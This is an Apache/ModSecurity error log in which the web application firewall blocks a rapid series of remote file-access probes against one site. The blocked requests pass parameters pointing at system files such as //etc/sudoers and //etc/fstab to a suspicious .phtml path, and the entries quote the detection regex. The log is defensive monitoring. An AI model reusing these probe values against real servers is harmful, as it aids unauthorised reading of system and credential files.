[Fri Mar 20 06:53:34.449098 2026] [:error] [pid 11167:tid 140411699963648] [client 57.141.18.87:41806] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/bashrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZHvHIg5MgXLBnicPrBQAAAcU"]
[Fri Mar 20 06:53:36.064880 2026] [:error] [pid 10189:tid 140411708356352] [client 57.141.18.74:41810] [client 57.141.18.74] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ethertypes"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZHjJ3M9BSuKP7CAYK-QAAAIQ"]
[Fri Mar 20 06:53:36.094247 2026] [:error] [pid 7235:tid 140411658000128] [client 57.141.18.85:41814] [client 57.141.18.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/printcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZH_qxLDW4GITHUkTXDQAAAQo"]
[Fri Mar 20 06:53:36.097316 2026] [:error] [pid 11642:tid 140411582465792] [client 57.141.18.51:41812] [client 57.141.18.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZH7ninkcc-iUj5ApQhgAAA5M"]
[Fri Mar 20 06:53:36.097801 2026] [:error] [pid 7893:tid 140411540502272] [client 57.141.18.89:41818] [client 57.141.18.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZHxCii7xarUs8iHZZxgAAAhg"]
[Fri Mar 20 06:53:36.412778 2026] [:error] [pid 10189:tid 140411683178240] [client 57.141.18.46:41842] [client 57.141.18.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/krb5.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZIDJ3M9BSuKP7CAYK-wAAAIc"]
[Fri Mar 20 06:53:36.630471 2026] [:error] [pid 21219:tid 140411649607424] [client 57.141.18.56:41848] [client 57.141.18.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZIPXLqtnMIWvjpaKMfwAAAos"]
[Fri Mar 20 06:53:36.954116 2026] [:error] [pid 7893:tid 140411716749056] [client 57.141.18.5:41852] [client 57.141.18.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inittab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZIBCii7xarUs8iHZZxwAAAgM"]
[Fri Mar 20 06:53:37.232361 2026] [:error] [pid 26799:tid 140411565680384] [client 57.141.18.120:41862] [client 57.141.18.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.allow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZIda6ubjKNq_cu4bFRQAAA1U"]
[Fri Mar 20 06:53:37.587277 2026] [:error] [pid 26799:tid 140411725141760] [client 57.141.18.115:41870] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rc.local"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZIda6ubjKNq_cu4bFRwAAA0I"]
[Fri Mar 20 06:53:37.983868 2026] [:error] [pid 7235:tid 140411607643904] [client 57.141.18.123:41876] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZIfqxLDW4GITHUkTXDwAAARA"]
[Fri Mar 20 06:53:38.360175 2026] [:error] [pid 11167:tid 140411565680384] [client 57.141.18.43:41886] [client 57.141.18.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.updated"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZIvHIg5MgXLBnicPrBwAAAdU"]
[Fri Mar 20 06:53:38.483837 2026] [:error] [pid 26799:tid 140411616036608] [client 57.141.18.14:41890] [client 57.141.18.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dracut.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZIta6ubjKNq_cu4bFSQAAA08"]
[Fri Mar 20 06:53:38.871994 2026] [:error] [pid 31215:tid 140411683178240] [client 57.141.18.14:41900] [client 57.141.18.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZIgF0L0L-SsrnPo5aZwAAAsc"]
[Fri Mar 20 06:53:39.125460 2026] [:error] [pid 7893:tid 140411666392832] [client 57.141.18.116:41902] [client 57.141.18.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZIxCii7xarUs8iHZZyAAAAgk"]
[Fri Mar 20 06:53:39.749797 2026] [:error] [pid 7235:tid 140411649607424] [client 57.141.18.1:41916] [client 57.141.18.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mke2fs.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZI_qxLDW4GITHUkTXEAAAAQs"]
[Fri Mar 20 06:53:39.856903 2026] [:error] [pid 9818:tid 140411733534464] [client 57.141.18.68:41922] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/fstab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZI11pVZ5mVmJwsFMhewAAAEE"]
[Fri Mar 20 06:53:40.591342 2026] [:error] [pid 11167:tid 140411557287680] [client 57.141.18.26:41934] [client 57.141.18.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZJPHIg5MgXLBnicPrCAAAAdY"]
[Fri Mar 20 06:53:40.653447 2026] [:error] [pid 21219:tid 140411616036608] [client 57.141.18.0:41936] [client 57.141.18.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locale.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZJPXLqtnMIWvjpaKMgAAAAo8"]
[Fri Mar 20 06:53:40.691133 2026] [:error] [pid 31215:tid 140411649607424] [client 57.141.18.35:41938] [client 57.141.18.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release-upstream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZJAF0L0L-SsrnPo5aaAAAAss"]
[Fri Mar 20 06:53:41.351464 2026] [:error] [pid 31215:tid 140411658000128] [client 57.141.18.0:41948] [client 57.141.18.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudoers"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZJQF0L0L-SsrnPo5aaQAAAso"]
[Fri Mar 20 06:53:41.504064 2026] [:error] [pid 10189:tid 140411674785536] [client 57.141.18.6:41954] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZJTJ3M9BSuKP7CAYLAAAAAIg"]
[Fri Mar 20 06:53:41.747237 2026] [:error] [pid 9818:tid 140411607643904] [client 57.141.18.22:41960] [client 57.141.18.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZJV1pVZ5mVmJwsFMhfAAAAFA"]
[Fri Mar 20 06:53:42.082846 2026] [:error] [pid 7893:tid 140411699963648] [client 57.141.18.91:41970] [client 57.141.18.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZJhCii7xarUs8iHZZyQAAAgU"]
[Fri Mar 20 06:53:42.387702 2026] [:error] [pid 7235:tid 140411641214720] [client 57.141.18.69:41972] [client 57.141.18.69] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.login"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZJvqxLDW4GITHUkTXEgAAAQw"]
[Fri Mar 20 06:53:43.094828 2026] [:error] [pid 9818:tid 140411574073088] [client 57.141.18.122:41996] [client 57.141.18.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/euca2ools"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZJ11pVZ5mVmJwsFMhfQAAAFQ"]
[Fri Mar 20 06:53:43.152051 2026] [:error] [pid 11167:tid 140411590858496] [client 57.141.18.77:41998] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZJ_HIg5MgXLBnicPrCgAAAdI"]
[Fri Mar 20 06:53:43.436403 2026] [:error] [pid 7235:tid 140411716749056] [client 57.141.18.26:42006] [client 57.141.18.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZJ_qxLDW4GITHUkTXEwAAAQM"]
